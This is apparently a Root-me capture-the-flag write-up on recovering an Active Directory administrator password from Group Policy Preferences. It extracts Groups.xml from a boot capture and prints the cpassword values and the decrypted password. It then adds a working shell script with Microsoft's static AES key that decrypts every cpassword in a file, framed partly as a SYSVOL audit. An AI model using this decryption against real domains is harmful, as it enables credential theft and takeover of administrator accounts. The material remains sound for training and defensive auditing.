Root-me.org

Active Directory - GPO

Group Policy Preferences

The challenge statement reads: “Network traffic during the boot sequence was recorded for an Active Directory workstation. Analyze this capture and find the administrator’s password.”

We’re given a pcap file of that boot. There are a few places where an administrator password can show up on the wire; one of the most obvious is the Group Policy Preferences file Groups.xml, which the workstation fetches from the domain controller over SMB during boot. If we open the pcap in Wireshark and export the SMB objects (or do the same with tshark), we get a Groups.xml:

tshark -r ch12.pcap --export-objects "smb,."

There’s a big flaw in how the password is encrypted: Windows always uses the same AES key, and Microsoft has published it. More info here: https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx

This makes it trivial to recover the password with a short script once the cpassword value is in hand.

This is the content of the exported Groups.xml:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Helpdesk" image="2" changed="2015-05-06 05:50:08" uid="{43F9FF29-C120-48B6-8333-9402C927BE09}">
    <Properties action="U" newName="" fullName="" description="" cpassword="PsmtscOuXqUMW6KQzJR8RWxCuVNmBvRaDElCKH+FU+w" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="Helpdesk"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrateur" image="2" changed="2015-05-05 14:19:53" uid="{5E34317F-8726-4F7C-BF8B-91B2E52FB3F7}" userContext="0" removePolicy="0">
    <Properties action="U" newName="" fullName="Admin Local" description="" cpassword="LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" subAuthority="" userName="Administrateur"/>
  </User>
</Groups>

We can see that the encrypted password (cpassword) of the Administrateur account is

cpassword="LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0" 

Now we need to either write a decryption script ourselves or fetch one from the internet. Here’s one: https://raw.githubusercontent.com/MartinIngesen/gpocrack/master/gpocrack.py

It’s a very simple Python script; when we run it on the cpassword value we get this:

python gpocrack.py "LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0"
Password is: TuM@sTrouv3
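To show what the decryption actually involves, here is an added example (my own code, not from the writeup and not gpocrack.py) that does the same thing with stock tools: it restores the stripped base64 padding, runs AES-256-CBC with the key from the MS-GPPREF document linked above and an all-zero IV, converts the UTF-16LE plaintext, and also scans a Groups.xml for every non-empty cpassword it carries, which is the same check an administrator would run against SYSVOL to find leftover GPP passwords. It assumes POSIX sh with base64, openssl and (optionally) iconv on PATH; the function names are this example's own, and the sample input is the Groups.xml shown above.

```shell
#!/bin/sh
# Added example, not code from the writeup or from gpocrack.py.
# Decrypts a GPP cpassword with the fixed AES-256 key Microsoft publishes in
# MS-GPPREF 2.2.1.1.4 (the MSDN page linked above) and scans a Groups.xml
# for every cpassword it carries. Assumes POSIX sh with base64, openssl and
# (optionally) iconv on PATH. All function names are this example's own.

GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_AES_IV=00000000000000000000000000000000   # MS-GPPREF: the IV is all zeros

# gpp_decrypt CPASSWORD -> plaintext password on stdout (no trailing newline).
# Groups.xml stores base64 with its '=' padding stripped, so restore it before
# decoding. The plaintext is UTF-16LE with PKCS#7 padding: openssl strips the
# padding, iconv converts the encoding (tr -d '\000' is a fallback that is
# only correct for ASCII passwords).
gpp_decrypt() {
    cp="$1"
    case $(( ${#cp} % 4 )) in
        2) cp="${cp}==" ;;
        3) cp="${cp}=" ;;
    esac
    printf '%s' "$cp" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
        | if command -v iconv >/dev/null 2>&1; then
              iconv -f UTF-16LE -t UTF-8
          else
              tr -d '\000'
          fi
}

# gpp_find_cpasswords FILE -> one "userName<TAB>cpassword" line per element
# with a non-empty cpassword (an empty cpassword means no password was set).
# Every XML element is put on its own line first, so the attribute order
# inside an element does not matter.
gpp_find_cpasswords() {
    tr '>' '\n' < "$1" | grep 'cpassword="[^"][^"]*"' | while IFS= read -r el; do
        cpw=$(printf '%s' "$el" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
        user=$(printf '%s' "$el" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
        printf '%s\t%s\n' "${user:-unknown}" "$cpw"
    done
}

# gpp_decrypt_file FILE -> "userName: password" for every entry found.
gpp_decrypt_file() {
    gpp_find_cpasswords "$1" | while IFS="$(printf '\t')" read -r user cpw; do
        printf '%s: %s\n' "$user" "$(gpp_decrypt "$cpw")"
    done
}

# Sample input: the Groups.xml recovered from the capture, as shown above.
GROUPS_XML_SAMPLE=$(mktemp)
cat > "$GROUPS_XML_SAMPLE" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Helpdesk" image="2" changed="2015-05-06 05:50:08" uid="{43F9FF29-C120-48B6-8333-9402C927BE09}">
    <Properties action="U" newName="" fullName="" description="" cpassword="PsmtscOuXqUMW6KQzJR8RWxCuVNmBvRaDElCKH+FU+w" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="Helpdesk"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrateur" image="2" changed="2015-05-05 14:19:53" uid="{5E34317F-8726-4F7C-BF8B-91B2E52FB3F7}" userContext="0" removePolicy="0">
    <Properties action="U" newName="" fullName="Admin Local" description="" cpassword="LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" subAuthority="" userName="Administrateur"/>
  </User>
</Groups>
EOF

# Usage: decrypt every cpassword in the sample file.
gpp_decrypt_file "$GROUPS_XML_SAMPLE"
```

A quick sanity check on the ciphertext length: the 43-character cpassword decodes to 32 bytes, i.e. two AES blocks, which is exactly what an 11-character password takes once encoded as UTF-16LE (22 bytes) and PKCS#7-padded to a block boundary. Pointing gpp_find_cpasswords at a whole SYSVOL copy (find ... -name '*.xml' and loop) is the usual way to confirm no GPP-stored passwords remain after applying MS14-025.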

References: https://adsecurity.org/?p=2288